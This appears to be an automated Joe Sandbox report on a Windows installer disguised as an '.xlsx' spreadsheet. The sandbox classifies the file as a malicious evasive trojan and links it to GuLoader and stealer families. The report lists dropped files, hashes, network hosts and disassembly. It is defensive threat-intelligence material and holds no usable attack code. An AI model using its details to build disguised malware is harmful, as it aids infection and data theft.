                                    		drive.usercontent.google.comUnited States
                                    		15169GOOGLEUSfalse
                                    172.217.19.174
                                    		drive.google.comUnited States
                                    		15169GOOGLEUSfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1576274
                                    Start date and time:2024-12-16 17:56:11 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 58s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:09-FD-94.03.60.175.07.xlsx.exe
                                    Detection:MAL
                                    Classification:mal76.troj.evad.winEXE@3/10@2/2
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 91%
                                    • Number of executed functions: 47
                                    • Number of non-executed functions: 76
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target 09-FD-94.03.60.175.07.xlsx.exe, PID 928 because there are no executed function
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: 09-FD-94.03.60.175.07.xlsx.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    11:57:43API Interceptor19x Sleep call for process: 09-FD-94.03.60.175.07.xlsx.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e19pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dllPurchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                        debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                          debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                            HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                                              HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                                                z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
                                                  z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
                                                    _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exeGet hashmaliciousGuLoaderBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\BooConf.ini

                                                        Download File
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):45
                                                        Entropy (8bit):4.7748605961854445
                                                        Encrypted:false
                                                        SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                        MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                        SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                        SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                        SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..

                                                        C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll

                                                        Download File
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.656006343879828
                                                        Encrypted:false
                                                        SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                        MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                        SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                        SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                                                        SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: Purchase-Order27112024.scr.exe, Detection: malicious, Browse
                                                        • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse
                                                        • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                        • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                        • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                        • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                        • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                        • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                        • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse
                                                        • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\nsxC3B4.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1199146
                                                        Entropy (8bit):3.3464346722807505
                                                        Encrypted:false
                                                        SSDEEP:6144:AP75ehxbAWL8zT55SgB9EZ+K1I3KDJ5QYu0Eqk90Js9g5PNp0AJ2aJ4aKh:AP75ehxkWL8zz9Eo+2eIYBkWz5P4Ph
                                                        MD5:88C3E9ED0EF59E29A94711546BC32ABC
                                                        SHA1:30235C24491AF4AFA40967FB2E97E8C47A3A7C54
                                                        SHA-256:41C07FDBD9838B799D5EF07E1C85045CBE0910B322D93D5C5298D558F61426BB
                                                        SHA-512:1B2F1EA7976F98421061CF119BA047BAFF85567C3AECAC56E54F32A41A04A9355281BF3526B3A5A5852A26D8CD089DFBE39752B3D6B40E1DDAD6211D266D16B3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:........,...................\...............................................................................................................................................................................................................................................................G...J...............j...........................................................................................................................................3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmc.ini

                                                        Download File
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):28
                                                        Entropy (8bit):4.110577243331642
                                                        Encrypted:false
                                                        SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                        MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                        SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                        SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                        SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:[Access]..Setting=Disabled..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\Aflare.Enk

                                                        Download File
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):28191
                                                        Entropy (8bit):4.5554172315993275
                                                        Encrypted:false
                                                        SSDEEP:384:lU5Foko0Wy6buRWcJT8QEai+6m7AiWjSHk8Rco00LIkqRPonGlo:lU5ekoHyzxT8KT7PiKkK0hrKJ
                                                        MD5:A8F95082B71E9CCC0A1B9D3285AB9125
                                                        SHA1:B475ED39780310238995E4C1F3F7CEC555D8AC98
                                                        SHA-256:0D0EBEBAF3EAA4D416399434511974EA882425CEBB01EC794C514CD329523C54
                                                        SHA-512:10C7E33F12C8A6ECB6088B016651A9FADC1BF6108E15F00584E59DEDBD93CF602BAD52487EF31035BFA858D3A762CEC0BC5B88FF8F01AFC4BDA9189DC40DF0EC
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...T..i.........BB........;..._.;........ss..........................-.........p.fff..[......L..A.X...P.......ss...___.....D.#.....XX..^^^.....ddd.......... ..................n...........gggg.tttt....................FF.. .............kkk.........tt..................44..a............5..WWW...................:........nn........."..###......."""".......i..........................00..............2...uu........n..............Q.......V.........XXX........33......CCC.....................$..........4..............................qq..,.........T....\\\......EE......................................mm.............R..**.>>>.h.=.........m.........j..=.||..............................+++.o.....................zzzzz.s.....!..................aa........../...TTT......L.........%.....................cccccc.9999.........X.@@@..J.....i.......N......!!....................G...........r.....................$...+.....u.7.I....""...{{...............................VVV....................HH.............b......

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\Impieties200.bjr

                                                        Download File
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):207998
                                                        Entropy (8bit):1.2479248406208852
                                                        Encrypted:false
                                                        SSDEEP:768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
                                                        MD5:5C283F56F45AD89C5D82538EA09AC0F5
                                                        SHA1:FA3736CF43F5841B9D4E28FF2024C17897EEF745
                                                        SHA-256:D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
                                                        SHA-512:2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..(.................>............................................................................................................8....dq......................`..-..............................................g..........s...............................................................................................................................b...RE.b.........................................................................w..........................................................................................%............................P..........]...............:.........B..........................................4.......................................................................n...............................................................o................4..................y...9........#......................m.....z...........................................................K.....D..............m...........................>...................?.....................k.....

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\firsaarsfdselsdags.luv

                                                        Download File
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):443489
                                                        Entropy (8bit):1.2463028275519636
                                                        Encrypted:false
                                                        SSDEEP:768:0B5HMEmj1BG+VGKVbkxUNjTj4Yl+ieTSrPb/1aKigAurLC2DVyTaL7B8IHBxCoxa:0kFoC4xKmYKV1tmGJJt0a+sWH0
                                                        MD5:913964ACDFFFA24344A401D48E08C653
                                                        SHA1:EE1E0AC79DA12D6439F9DF5B865347647473642A
                                                        SHA-256:B3A4E2499F6A793497BAB8F5B6CC38462FD70F955308596ACFFF03D11F2F6ED4
                                                        SHA-512:2AEBEB7DFFACF4150CCF6ED91EF5501B129331E5A2A4A465FC542562C52907FDA3990F7BE5F17B60854DE7FD34E6E2E873ED8C0DE6788964894890F69A9F261C
                                                        Malicious:false
                                                        Preview:..9............................................................2...................A.....................................................7...........................................................................g.......m..........................v.z.........9.........................K....................................................................................%...................:....................................................h...(... ..........]......]...........................-......................................................f......2.................d..........C...........................9.........._.....................L.......................................v..........................J...................\....................|........................&......'....N.....................................o............................8.....................................................................................................n...................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\portitor.win

                                                        Download File
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):209062
                                                        Entropy (8bit):1.2469617066336303
                                                        Encrypted:false
                                                        SSDEEP:768:aq+yDnL4aSptsfjJcMBkQnTum3yc5rUGLJTLAP6zp2R5O73XKymSRQoWgqVB7L+v:T7c811jBM9Y1qeu30oHw
                                                        MD5:607886D87859E45164D2959809AB5367
                                                        SHA1:4E86EB72512D4C9BE32304E3A12B499D6A86084B
                                                        SHA-256:A05695DF251298ED2F35E2DFA2C4CF44D5BACCC391615FACD34FA6411BB43217
                                                        SHA-512:A767C56234A265E17FE3D05A1218D628419E3B750E7D55DD5E2D57A847DBF7B72E10270A1D9D14D39D62BCEF38818DE54168AF87C2DE59FDBF503F0C382DA5DE
                                                        Malicious:false
                                                        Preview:...............................................i........A........5............................b.t....!......................J.........................&................../Z.........................................................|........................T......^.................8...................D...............:..q......g.......................................................{........................p.................................................|..............B......`..............................0...............................o.......................N.......................f........................p............^.............................................................................+..A......................k........@...........................()......g..................U...................d.......................f...............].LF...................................................................}.._............................8......................................7..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\affodill.Hav

                                                        Download File
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):290478
                                                        Entropy (8bit):7.563899642939822
                                                        Encrypted:false
                                                        SSDEEP:6144:1ehxbAWL8zT55SgB9EZ+K1I3KDJ5QYu0Eqk90Jb:1ehxkWL8zz9Eo+2eIYBkWJ
                                                        MD5:7C5950C0904C276B5EEA38CE56D01613
                                                        SHA1:2B55A0A107564148DAFD55B58CE9842962DD273C
                                                        SHA-256:2DF9631D6B7FFE6FF7DF858DB2953F7EA75AB9F37796B9531E4DFE587BA54FBA
                                                        SHA-512:C82B984900CF00F055D0ACAAA6902189455F9DA4838DF0A9B82AF4E137F87AF68E941953D2039257F322F12FC0980B0B1D011A5F14619CF62FBB0F205D8D5C39
                                                        Malicious:false
                                                        Preview:.......uu....................iiii.....C...........2.............hhh....4..z...>>..(.........}}}}..........................EEE........W...............................................||...RRR...3.........@.........|.]...........................................r..888.............nnnnnn.....*.........PPP........................#..*.~..............--....%%%%%%.../.......................ttt.......................,.................. ....d............................XX.W......WWWW..............QQ................v...............................#.....!!!............^^^................:::...L...{...bb...........j.a....7..............aaa..............................................tt..........u.RR.x..ZZ.NNN..n...........''''....X....LLL..a....ffff..........~~..T.............1...........KK................................KKKK..=..........]..l......../......QQ......UUUU........2....NNN.[[...........FF....M...$../.`..................)....@.......JJJJ.....e......<...................!...............b..

                                                        C:\Users\user\subacidity.lnk

                                                        Download File
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                        Category:dropped
                                                        Size (bytes):918
                                                        Entropy (8bit):3.519682367081025
                                                        Encrypted:false
                                                        SSDEEP:12:8wl0c0a/ledp8wXuQUlbq/JMRPbdpYmHbqjMRPBMJsW+slmYXcuzJCN85v4t2YZ2:8QudO/9Q6jd9a6+y3OcA24qy
                                                        MD5:7900E25CFFD2895DBDEB60C113A65174
                                                        SHA1:88273771D630FCA25150AB73319CAD9559DF2D8C
                                                        SHA-256:C199827F2DAB1C4952BBF0B6CEF442FE6920A74A5851ABD676C9BA11E9B4B00D
                                                        SHA-512:C444D6E76984BD94F165EFD9444E9DC179FD5451F3A94CE6319C1F83128E420232A8BA649D7811D9E5F3DFA03A02DA663EBFC8260D7FCF79F50E3499C69EE01A
                                                        Malicious:false
                                                        Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........cutline.sil.H............................................c.u.t.l.i.n.e...s.i.l.......2.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.c.u.t.l.i.n.e...s.i.l.S.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.t.y.p.h.l.o.s.t.o.m.y.\.C.a.r.f.u.f.f.l.i.n.g.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.884499331746193
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:09-FD-94.03.60.175.07.xlsx.exe
                                                        File size:530'598 bytes
                                                        MD5:321a9608e5bf03bf63f4574d0df1a380
                                                        SHA1:71c523fc14b83e0c8d5eac9bcc61c9487c1f2dfd
                                                        SHA256:c113d227b647a1a61b1f9f6c5350a25a43acc26960ef9d9b1a3c5e80e68d75f0
                                                        SHA512:ea16ef04d171e09971b49a8ee2cb1a4082ae794db9e6e53b2e702815cd275c48a390866de53845acf817a167ec14b4bf4c8c79cb8f590c8759f0cc1577a3e7ae
                                                        SSDEEP:12288:XRV78hkvtMm2pbzH3lzmBI9jD9Bu3faTXXes:I+vthovMO9jhBsiTXX7
                                                        TLSH:EEB423063AD1D81AD15D9A364FB3C2BDC376EC745C188E077F303E5B6C32A914A7A296
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@

                                                        File Icon

                                                        Icon Hash:0714262e34390f06

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x40335a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:e221f4f7d36469d53810a4b5f9fc8966

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 000002D8h
                                                        push ebx
                                                        push ebp
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        xor ebp, ebp
                                                        pop esi
                                                        mov dword ptr [esp+18h], ebp
                                                        mov dword ptr [esp+10h], 00409230h
                                                        mov dword ptr [esp+14h], ebp
                                                        call dword ptr [00407034h]
                                                        push 00008001h
                                                        call dword ptr [004070BCh]
                                                        push ebp
                                                        call dword ptr [004072ACh]
                                                        push 00000009h
                                                        mov dword ptr [004292B8h], eax
                                                        call 00007F11BCBCC8EAh
                                                        mov dword ptr [00429204h], eax
                                                        push ebp
                                                        lea eax, dword ptr [esp+38h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebp
                                                        push 004206A8h
                                                        call dword ptr [0040717Ch]
                                                        push 0040937Ch
                                                        push 00428200h
                                                        call 00007F11BCBCC555h
                                                        call dword ptr [00407134h]
                                                        mov ebx, 00434000h
                                                        push eax
                                                        push ebx
                                                        call 00007F11BCBCC543h
                                                        push ebp
                                                        call dword ptr [0040710Ch]
                                                        push 00000022h
                                                        mov dword ptr [00429200h], eax
                                                        pop edi
                                                        mov eax, ebx
                                                        cmp word ptr [00434000h], di
                                                        jne 00007F11BCBC99D9h
                                                        mov esi, edi
                                                        mov eax, 00434002h
                                                        push esi
                                                        push eax
                                                        call 00007F11BCBCBF93h
                                                        push eax
                                                        call dword ptr [00407240h]
                                                        mov ecx, eax
                                                        mov dword ptr [esp+1Ch], ecx
                                                        jmp 00007F11BCBC9ACBh
                                                        push 00000020h
                                                        pop edx
                                                        cmp ax, dx
                                                        jne 00007F11BCBC99D9h
                                                        inc ecx
                                                        inc ecx
                                                        cmp word ptr [ecx], dx

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x132d8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x5ec60x600060ec0c4d80dd6821cdaced6135eddfd5False0.6593424479166666data6.438901783265187IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x90000x202f80x60099cdd6cde9adee6bf3b24ee817b4574bFalse0.4830729166666667data3.8340327961758165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x4a0000x132d80x134006a5bbc33287fc34c026c3652aab40ca4False0.7685800527597403data6.977243320980138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x4a4480xb1b3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9923501351915763
                                                        RT_ICON0x556000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4311203319502075
                                                        RT_ICON0x57ba80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.48053470919324576
                                                        RT_ICON0x58c500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5330490405117271
                                                        RT_ICON0x59af80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5647540983606557
                                                        RT_ICON0x5a4800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6353790613718412
                                                        RT_ICON0x5ad280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.5961981566820277
                                                        RT_ICON0x5b3f00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3176829268292683
                                                        RT_ICON0x5ba580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.42124277456647397
                                                        RT_ICON0x5bfc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6453900709219859
                                                        RT_ICON0x5c4280x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.4274193548387097
                                                        RT_ICON0x5c7100x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4651639344262295
                                                        RT_ICON0x5c8f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5067567567567568
                                                        RT_DIALOG0x5ca200x100dataEnglishUnited States0.5234375
                                                        RT_DIALOG0x5cb200x11cdataEnglishUnited States0.6056338028169014
                                                        RT_DIALOG0x5cc400xc4dataEnglishUnited States0.5918367346938775
                                                        RT_DIALOG0x5cd080x60dataEnglishUnited States0.7291666666666666
                                                        RT_GROUP_ICON0x5cd680xbcdataEnglishUnited States0.601063829787234
                                                        RT_VERSION0x5ce280x1a4dataEnglishUnited States0.5642857142857143
                                                        RT_MANIFEST0x5cfd00x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984

                                                        Imports

                                                        DLLImport
